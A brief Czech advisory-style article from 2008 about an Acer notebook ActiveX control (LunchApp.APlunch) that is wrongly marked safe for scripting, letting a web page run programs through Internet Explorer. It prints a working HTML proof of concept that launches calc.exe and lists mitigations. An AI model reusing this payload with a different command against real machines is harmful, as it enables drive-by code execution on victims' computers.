Zpět na seznam článků     Číst komentáře (2)     Verze pro tisk

Backdoor v notebooku acer

Autor: Saitraje_   
7.2.2008

Backdoor umožňující rozjet cokoli na počítači oběti


Tento backdoor byl objeven teprve nedávno a firma Acer se k němu veřejně prohlásila před dvěmi dny.

Tato chyba není na všech noteboocích, ale pouze na přibližně polovině.
Jedná se o to, že firma omylem označila komponentu ActiveX za safe for scripting, což znamená že se v pohodě spustí.
Komponenta: LunchApp.APlunch
CLSID: D9998BD0-7957-11D2-8FED-00606730D3AA

Tato komponenta je registrována kontrolou OCX, což znamená, že pohou návštěvou stránky vám může někdo spustit cokoli na počítači.
Chová se tedy přibližně jako trojský kůň.

Soubor se jmenuje LunchApp.ocx a je umístěn C:\windows\system\LunchApp.ocx.
[link]

Pokud ovšem používáte jiný prohlížeč než je Internet Explorer, tak jste v bezpečí.
Pokud chcete vyzkoušet, zda-li tuto chybu máte, napište následující HTML stránku a spustťe, pokud se vám otevře kalkulačka, tak chybu máte.

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\windows\system32\calc.exe", "");
</script>
</html>
</body>


Jak zabránit této chybě?
1) Používat jiný prohlížeč
2) Zakázat tuto komponentu [link]

Pokud chcete více vědět o této chybě, následujte tento [link]

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 1/1

1  2  3  4  5    
(známkování jako ve škole)